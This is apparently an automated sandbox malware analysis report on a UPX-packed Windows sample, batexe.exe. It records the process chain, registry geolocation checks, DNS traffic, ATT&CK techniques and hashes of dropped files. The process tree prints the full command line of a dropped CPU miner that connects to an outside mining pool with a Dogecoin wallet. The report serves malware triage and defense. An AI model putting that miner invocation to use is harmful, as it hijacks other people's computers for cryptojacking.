73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
291s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 13:26 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3324	b2e.exe
1468	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
1468	cpuminer-sse2.exe
1468	cpuminer-sse2.exe
1468	cpuminer-sse2.exe
1468	cpuminer-sse2.exe
1468	cpuminer-sse2.exe
1468	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3876-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3876 wrote to memory of 3324	3876	batexe.exe	85
PID 3876 wrote to memory of 3324	3876	batexe.exe	85
PID 3876 wrote to memory of 3324	3876	batexe.exe	85
PID 3324 wrote to memory of 1140	3324	b2e.exe	86
PID 3324 wrote to memory of 1140	3324	b2e.exe	86
PID 3324 wrote to memory of 1140	3324	b2e.exe	86
PID 1140 wrote to memory of 1468	1140	cmd.exe	89
PID 1140 wrote to memory of 1468	1140	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3876
- C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80F3.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1468

Network

DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

21.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.236.111.52.in-addr.arpa

IN PTR

Response
DNS

173.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.178.17.96.in-addr.arpa

IN PTR

Response

173.178.17.96.in-addr.arpa

IN PTR

a96-17-178-173deploystaticakamaitechnologiescom

198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

6.1kB
9.0kB
68
68
127.0.0.1:64722

cpuminer-sse2.exe
127.0.0.1:64724

cpuminer-sse2.exe

8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

21.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

21.236.111.52.in-addr.arpa
8.8.8.8:53

173.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

173.178.17.96.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe

Filesize
5.9MB

MD5
65887eee01f549ef24c687c8549a5710

SHA1
c2fa20d3d0dcd8c2cf9ebe1a2b5380469dc3be56

SHA256
0cfd72951a49afafba1289ca1975ecb38b64ba77082382bcab1ca287b41f4497

SHA512
2db78089f7f61c33abb2aa7ce0185fb76e27675a5053a70a77c96bab3ab9bf676cfcd968a67ce8579835aa2fee5a37456baddaa3a276a6ab67fc2765c5c7728e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe

Filesize
617KB

MD5
80dd350cd3b897ce9f0aeb67c7c6f995

SHA1
15a3a6815bf13c005986d85ed8f2fe65fb17497b

SHA256
318a595b5d0d18a2cd8c4f4e2c2bc315b253d237e8e7412a7e15594ac2d50f1c

SHA512
7f4324ee00954d8d38473ab81047ef6203eff6fd51baf3b992a38d3d9b33175054c836749a577bc2b69359e0899ebf8eafbe796aa5e6669dd1c81ff3d8f6305e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6FBC.tmp\b2e.exe

Filesize
619KB

MD5
b0c9fda3191e7d1c08f29b288d1838ab

SHA1
553f7607c19fed51e6b1fc55047209dbe234b191

SHA256
ad10874bea2d6b4cdcf1c7c0f953cf3bc80d4a82c83bccf55a21455ca00f6d05

SHA512
c43a4ee50f9d4884793a54b8089ecde553fc8907e61ce957ba2dccae1581d6a5c06663d7e7e2f2a69ddc361615d0ca4aff39d9812c4d825c58f1d630b4513439

Download Submit
C:\Users\Admin\AppData\Local\Temp\80F3.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
281KB

MD5
cdd53b763a7f4dae9682188a8bd8dbe1

SHA1
3aa60b2fa987cdeee55d3f07836058dfb47c9699

SHA256
6e41e41e77ef6d066ab1de85f3b82100a7b73bc76189a98700e43f1d11051da8

SHA512
d817cd0de7712409b42053d6ffaaf9c73d4b37779321a4afb90002d5f45b89724ca5fc224c23e675eecb05c1edd6e058d2834efe468e11fb5b8ceab4e5c13dae

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
306KB

MD5
66d56894b82df27d44bd511aa6f0c6db

SHA1
2505f120ccf23e49ce2f6c274d4612bb6f177368

SHA256
55c007a1f45896d92de7d0f9ad6dd6b04dd6569a298ce609c307737f1068c74a

SHA512
8792d429e799c4df666c0b178b0dbb4be00e7c86c06c1086bee21e4134e647af67fe12f88c4c70d1e1739c954558984de26cb44156deb3736e76166aaf9c00a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
152KB

MD5
287202282ffe1019547722bc97614dce

SHA1
b4844e3b6569a22b8ba463f00397a0a0ac85e31c

SHA256
5da0307ae5b42aad03f735a60aea6bfc216e2153e8e2e2d1d50feb50803c8051

SHA512
3327e40261fb3120117bf8ca13371cd8faa2f9e8969fe81cf63baf39e69f1702d51f1b45d673acd90d2780fcacb96d893387c865fbe5379f71e67d048e78cd51

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
61KB

MD5
f4ad9f5d0b1a1fbf664ba6ed3a9a7375

SHA1
200d78e70aca2aaad567ef35953a678e74d43681

SHA256
b5ad566a10d38c5b9ab3cd35309f6bc19814589957b66cfcf5cd7950efebacdf

SHA512
38c06dd655eea817d998b988336706e36037e7a2be6256ca40a1ad48556fe2f957be17dc4c49405dec3b13db814ca040463211e5d797f97b954dcf41382503f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
49KB

MD5
92a585649838636e9b1ab41d0bafc3e7

SHA1
d857bb427d75f55db56f40d1112c77da6b5098eb

SHA256
4fd619f3177edc29b9cb7f2ef503f0f83465cd7777e9f385d5d6bb292d1574c8

SHA512
8c901aa5de347194e3c88307a452379465ac1566fce0d0416e5f2ed220005f458c33c6354e1150ed1ddaaa7f8006b6c4bbde6efd7b0801c704d66bed32735a4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
243KB

MD5
0fcad16719580a7447145e7ea4b8772e

SHA1
e5de26f2be597450cac8ad77bd5d3178e488e15a

SHA256
24aed82585888e0b426ee0a6389dbafdf792795ab6851baa23461536f7b8a83d

SHA512
dabea7cb175a3246d768897814a2057cbadc7be049a6861d6ddcde18ee062511394a596b7e9c551a8787a721e9d544593f2b8839310a17a14905c5bacfa27d9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
92KB

MD5
2a270f3dbca0dc52b17c5e7a1b2967c5

SHA1
324a964c337be3188b884d3dd0a0f760e3488979

SHA256
aa4dea59e11d2eaab8ac1094f06b9251cb78c8e9702b7fb9fc9dfce0f4631d4e

SHA512
85a1c7f48eff25a3634a3b7797dc04f4ff90e10b1ae51688d0832c24754622123c5574d018d6c8c0b0b51b0f06fd1d5ba0eb970c753d7384db7a78333f1b1602

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
112KB

MD5
9cd903b456cf8e71c4f47de42528221c

SHA1
08cfbc17484bdbd7e0794feb907437f06b25fd1f

SHA256
ec28a4a2fe3d12fad857aee376c13311f584b0124fcb9feb81d1b8771e260e71

SHA512
0381d89fc594744719050a780e6eb93549f2af4273cc30925d16598b537b59b35839044911f90b6cfc3c564c5f2b1462eea445d96f5498a1058ed5871bc7cbeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
317KB

MD5
dd48c808ed0e34567516927891541afa

SHA1
fe92af00363607dc2eb15c8e32db7b0b40b6dbf8

SHA256
a5682c7b86731af7c1deba448293a2ec8d91eaffca1a8c7d9f6669881bc6924b

SHA512
90806c0ebef9efa0323313e1abe77e6a0fb0e33ec2936fac10a397d1974c3da18f9a4160c4567c6c2522eae36c0e2027c67f8e2bc64239aaf29a14763cfc856a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
99KB

MD5
d550f9e62036533abd326453040369fc

SHA1
795eb97ec9d485514c1bfce0f325c540d95bc569

SHA256
e26b2d2ef0c7bfe698a1e8771704e81843917d51584785a4513d54f40a46691a

SHA512
e30eac7aca7fe58548c1aa13512d87185a257fabf10bbec07070b1294320991bf9bd3d95b927aeaee2c20ba91fbaa9f2dd598934027260c538240c42ef635ec8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1468-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/1468-49-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/1468-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/1468-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1468-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1468-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/1468-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3324-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3324-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3876-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.